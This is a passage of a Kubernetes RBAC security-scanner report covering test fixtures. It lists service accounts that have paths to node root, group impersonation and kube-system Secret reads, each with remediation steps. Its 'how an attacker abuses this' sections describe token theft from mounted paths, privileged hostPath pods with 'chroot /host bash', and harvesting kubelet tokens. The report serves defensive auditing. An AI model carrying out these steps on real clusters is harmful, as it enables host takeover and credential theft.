    Permission granted impersonate groups
    Gives the attacker can impersonate the system:masters group, bypassing all RBAC
Remediation
Remove every impersonate grant on a path to system:masters. Concretely: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. List subjects with impersonate: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "User" or .kind == "Group" or .kind == "ServiceAccount") | .metadata.name + " → " + (.roleRef.name)' then check each role's rules for impersonate.
  2. Almost no production workload genuinely needs impersonate users/groups. Kubectl plugins/dashboards that *do* need it should use kubectl --as=... from a human admin's session, not a workload SA.
  3. Break the chain: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  4. For kubectl-as-a-service workloads, scope the impersonation with resourceNames: [<allowed-user>] to a fixed allowlist of principals; *never* users: [*] or groups: [*].
  5. Wire admission policy: a Kyverno rule that fails any RoleBinding granting impersonate to a non-system subject without an explicit resourceNames carve-out.
CRITICAL

Subjects can reach node escape (host root) in 1 hop(s)

KUBE-PRIVESC-PATH-NODE-ESCAPE 6 subjects Score 9.4–8.9

Affected subjects (6)

CRITICAL ServiceAccount/psa-suppressed/default Cluster 9.4
ServiceAccount/psa-suppressed/default can reach node escape (host root) in 1 hop(s)
Scope · Cluster Source ServiceAccount/psa-suppressed/defaultnode escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/psa-suppressed/default

Subject ServiceAccount/psa-suppressed/default has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (1 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/psa-suppressed/default/ via pod_host_escape (privileged): runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/psa-suppressed/default yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/psa-suppressed/default.
  2. Acting as ServiceAccount/psa-suppressed/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  3. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker chroot /host bash and now runs as root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/psa-suppressed/default
    Permission granted privileged
    Gives the attacker runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the permission privileged that enables the first hop (ServiceAccount/psa-suppressed/default/).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the permission privileged that enables the first hop (ServiceAccount/psa-suppressed/default/).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
CRITICAL ServiceAccount/rbac-fixtures/sa-nodes-proxy Cluster 9.4
ServiceAccount/rbac-fixtures/sa-nodes-proxy can reach node escape (host root) in 1 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-nodes-proxynode escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-nodes-proxy

Subject ServiceAccount/rbac-fixtures/sa-nodes-proxy has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (1 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/rbac-fixtures/sa-nodes-proxy/ via nodes_proxy (get nodes/proxy): can reach kubelet API via nodes/proxy WebSocket verb confusion

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-nodes-proxy yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-nodes-proxy.
  2. Acting as ServiceAccount/rbac-fixtures/sa-nodes-proxy, the attacker uses nodes/proxy (get nodes/proxy) to forward requests directly to the kubelet on each node. Combined with the kubelet's /exec endpoint this becomes a primitive for running commands inside any pod the kubelet can see.
  3. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker chroot /host bash and now runs as root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. nodes/proxy → kubelet API nodes_proxy

    The nodes/proxy subresource forwards requests to the kubelet on each node. Combined with kubelet's /exec endpoint and a WebSocket verb mismatch, this becomes a primitive for executing commands inside any pod the kubelet can reach.

    From ServiceAccount/rbac-fixtures/sa-nodes-proxy
    Permission granted get nodes/proxy
    Gives the attacker can reach kubelet API via nodes/proxy WebSocket verb confusion
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the permission get nodes/proxy that enables the first hop (ServiceAccount/rbac-fixtures/sa-nodes-proxy/).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the permission get nodes/proxy that enables the first hop (ServiceAccount/rbac-fixtures/sa-nodes-proxy/).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
CRITICAL ServiceAccount/vulnerable/default Cluster 9.4
ServiceAccount/vulnerable/default can reach node escape (host root) in 1 hop(s)
Scope · Cluster Source ServiceAccount/vulnerable/defaultnode escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/default

Subject ServiceAccount/vulnerable/default has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (1 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/vulnerable/default/ via pod_host_escape (hostPID,hostIPC): runs in pod vulnerable/host-ns-app-7cb46d5788-8xp2h with hostPID, hostIPC

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/vulnerable/default yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/vulnerable/default.
  2. Acting as ServiceAccount/vulnerable/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  3. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker chroot /host bash and now runs as root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/vulnerable/default
    Permission granted hostPID,hostIPC
    Gives the attacker runs in pod vulnerable/host-ns-app-7cb46d5788-8xp2h with hostPID, hostIPC
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the permission hostPID,hostIPC that enables the first hop (ServiceAccount/vulnerable/default/).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the permission hostPID,hostIPC that enables the first hop (ServiceAccount/vulnerable/default/).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
CRITICAL ServiceAccount/rbac-fixtures/sa-pod-create Cluster 8.9
ServiceAccount/rbac-fixtures/sa-pod-create can reach node escape (host root) in 2 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-pod-createnode escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (2 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/psa-suppressed/default via pod_create_token_theft (create pods): can create pods that mount ServiceAccount psa-suppressed/default
2. ServiceAccount/psa-suppressed/default/ via pod_host_escape (privileged): runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-pod-create yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-pod-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/psa-suppressed/default ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/psa-suppressed/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  4. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker chroot /host bash and now runs as root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/psa-suppressed/default
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount psa-suppressed/default
  2. Step 2 of 2 Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/psa-suppressed/default
    Permission granted privileged
    Gives the attacker runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/psa-suppressed/default).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the create pods capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/psa-suppressed/default).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
CRITICAL ServiceAccount/rbac-fixtures/sa-token-create Cluster 8.9
ServiceAccount/rbac-fixtures/sa-token-create can reach node escape (host root) in 2 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-token-createnode escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (2 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/psa-suppressed/default via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount psa-suppressed/default
2. ServiceAccount/psa-suppressed/default/ via pod_host_escape (privileged): runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-token-create yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/rbac-fixtures/sa-token-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/psa-suppressed/default. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/psa-suppressed/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  4. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker chroot /host bash and now runs as root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

    From ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/psa-suppressed/default
    Permission granted create serviceaccounts/token
    Gives the attacker can mint tokens for ServiceAccount psa-suppressed/default
  2. Step 2 of 2 Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/psa-suppressed/default
    Permission granted privileged
    Gives the attacker runs in pod psa-suppressed/psa-priv-app-54c64bdd84-rggt6 with privileged
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the permission create serviceaccounts/token that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/psa-suppressed/default).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the permission create serviceaccounts/token that enables the first hop (ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/psa-suppressed/default).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
CRITICAL ServiceAccount/vulnerable/privileged-reader Cluster 8.9
ServiceAccount/vulnerable/privileged-reader can reach node escape (host root) in 2 hop(s)
Scope · Cluster Source ServiceAccount/vulnerable/privileged-readernode escape: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader has a privesc path that terminates in the ability to schedule a pod with host-level access (hostPath: /, privileged: true, hostPID, or hostNetwork), which is structurally equivalent to root on the worker node. Once an attacker has node root, all defense-in-depth at the Kubernetes layer is bypassed: pod isolation depends on the kernel and runtime, not on RBAC, and node root reads every other pod's filesystem (including projected ServiceAccount tokens) and every kubelet credential.

The chain (2 hop(s); each step uses an explicit RBAC verb or pod primitive the engine validated):
1. ServiceAccount/vulnerable/privileged-readerServiceAccount/vulnerable/default via pod_create_token_theft (create pods): can create pods that mount ServiceAccount vulnerable/default
2. ServiceAccount/vulnerable/default/ via pod_host_escape (hostPID,hostIPC): runs in pod vulnerable/host-ns-app-7cb46d5788-8xp2h with hostPID, hostIPC

Node escape is qualitatively different from cluster-admin: cluster-admin gives API control; node escape gives *operational* control over a host. With node root the attacker can plant a persistent rootkit, install a kernel module, capture every container's network traffic via tcpdump on the host's cni0/flannel.1/cali* interface, and exfiltrate every projected ServiceAccount token by reading /var/lib/kubelet/pods/*/volumes/.../token. From there, those tokens cascade into more cluster-admin paths.

Impact Compromise of ServiceAccount/vulnerable/privileged-reader yields host root on a worker node. Every co-located pod's filesystem and every projected SA token are immediately readable, and the kubelet client cert can be used to access node-level APIs.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload or credential bound to ServiceAccount/vulnerable/privileged-reader.
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/vulnerable/default ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/vulnerable/default, the attacker schedules a pod with host-level access (privileged: true, hostPath: /, hostPID, or hostNetwork) and escapes onto the underlying node. From there they read every co-located pod's filesystem, every projected ServiceAccount token on that node, and the kubelet's client cert.
  4. Final step: a privileged pod with hostPath: / (or hostPID + privileged: true) is created. The attacker chroot /host bash and now runs as root on the worker node, reading every other pod's filesystem, every projected ServiceAccount token on that node, and the kubelet client cert.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-readerServiceAccount/vulnerable/default
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount vulnerable/default
  2. Step 2 of 2 Container escape to host pod_host_escape

    The pod is configured in a way that makes escaping to the underlying node trivial: privileged: true, hostPID, hostNetwork, or a sensitive hostPath mount (root, docker.sock, etc.). An attacker who controls the container reaches root on the node, then has access to every pod and kubelet credential on that node.

    From ServiceAccount/vulnerable/default
    Permission granted hostPID,hostIPC
    Gives the attacker runs in pod vulnerable/host-ns-app-7cb46d5788-8xp2h with hostPID, hostIPC
Remediation
Break the chain by either (a) removing the pod-creation primitive that enables node escape, or (b) constraining what privileged settings the chain's pods can request. Lowest-cost cut: remove the create pods capability that enables hop 1 (ServiceAccount/vulnerable/privileged-readerServiceAccount/vulnerable/default).
  1. Identify which hop ends in pod_create_* or grants Pod Security violations (privileged, hostPath, hostPID, hostNetwork).
  2. Apply Pod Security Admission restricted profile to namespaces reachable from this chain: kubectl label namespace <ns> pod-security.kubernetes.io/enforce=restricted. This blocks privileged pods at admission.
  3. Audit any namespace that is privileged-labeled. DaemonSets and operators that genuinely need host access should run in a dedicated namespace not reachable via tenant chains.
  4. Remove the cited capability: remove the create pods capability that enables hop 1 (ServiceAccount/vulnerable/privileged-readerServiceAccount/vulnerable/default).
  5. Wire admission policy (Kyverno restrict-host-path-mount, disallow-privileged-containers) so future pods cannot regress.
HIGH

Subjects can read kube-system Secrets in 1 hop(s)

KUBE-PRIVESC-PATH-KUBE-SYSTEM-SECRETS 3 subjects Score 8.6–8.1
MITRE ATT&CK: T1552.007T1078.004T1098

Affected subjects (3)

HIGH ServiceAccount/vulnerable/privileged-reader Namespace 8.6
ServiceAccount/vulnerable/privileged-reader can read kube-system Secrets in 1 hop(s)
Scope · Namespace Source ServiceAccount/vulnerable/privileged-reader → kube-system Secrets (control-plane namespace). Reads here typically yield credentials usable cluster-wide
Category: Data Exfiltration Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader has a privesc path that terminates in get/list/watch secrets in kube-system. This is not full cluster-admin, but it is the most consequential namespace to read. kube-system Secrets typically contain the credentials that *unlock* cluster-admin: cloud IAM keys (cloud-controller-manager, EBS/PD/Disk CSI), registry pull secrets (system images), addon API keys, and tokens for SAs that are themselves bound to cluster-admin (operator installers, helm-controllers).

The chain (1 hop(s); each step uses an explicit RBAC verb the engine validated):
1. ServiceAccount/vulnerable/privileged-reader/ via read_secrets (get,list secrets): can read secrets in kube-system or cluster-wide

In production clusters this path is the single most common one in kubesplaining's output. secrets:get is over-granted by Helm chart defaults, by stale view-style roles, and by ConfigMap-reader roles that wildcard resources to include Secrets. The path is short (often 1-2 hops) and exploitation is trivial: the attacker decodes base64 and is in.

Impact Reading kube-system Secrets typically yields cloud-account compromise, registry write (supply-chain implant), and tokens for cluster-admin-adjacent SAs. In practice, this is a one-way ratchet to full cluster control through subsequent privesc paths.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload mounting ServiceAccount/vulnerable/privileged-reader.
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker reads ServiceAccount tokens out of the cluster's Secrets store (get,list secrets) and uses one of those tokens (typically a control-plane controller's) to escalate. Read-access on Secrets is the most consequential single verb in Kubernetes RBAC because every other identity's credential lives in a Secret object somewhere.
  3. Final step: the attacker has get secrets -n kube-system. They list every Secret, decode each data value, and pull cloud IAM credentials, registry pull secrets, addon API keys, and SA tokens for cluster-admin-adjacent operators. Each of those is a separate privesc path, often shorter than the one that got them here.
  1. Secrets read access read_secrets

    get/list/watch on Secrets in kube-system or cluster-wide reads the controller-manager, scheduler, and node-bootstrap tokens: every credential needed to act as the control plane.

    From ServiceAccount/vulnerable/privileged-reader
    Permission granted get,list secrets
    Gives the attacker can read secrets in kube-system or cluster-wide
Remediation
Eliminate the path by tightening secrets:get in kube-system to a narrow allowlist of system controllers, then break the chain at: remove the permission get,list secrets that enables the first hop (ServiceAccount/vulnerable/privileged-reader/).
  1. List who can get secrets -n kube-system: kubectl auth can-i get secrets -n kube-system --as=system:serviceaccount:<ns>:<sa> for every workload SA, and kubectl get rolebindings,clusterrolebindings -A -o yaml | grep -B5 secrets to find broad grants.
  2. Move kube-system Secrets that don't need to be live to External Secrets Operator (Vault/SecretsManager) so the in-cluster Secret becomes a generated artifact instead of source-of-truth.
  3. Break the chain at: remove the permission get,list secrets that enables the first hop (ServiceAccount/vulnerable/privileged-reader/).
  4. For controllers that legitimately need a kube-system Secret read, scope the binding to that exact named Secret using resourceNames, not resources: [secrets].
  5. Wire admission policy: a Kyverno rule that fails any new RoleBinding/ClusterRoleBinding granting secrets verbs without resourceNames to non-system subjects.
HIGH ServiceAccount/rbac-fixtures/sa-pod-create Namespace 8.1
ServiceAccount/rbac-fixtures/sa-pod-create can read kube-system Secrets in 2 hop(s)
Scope · Namespace Source ServiceAccount/rbac-fixtures/sa-pod-create → kube-system Secrets (control-plane namespace). Reads here typically yield credentials usable cluster-wide
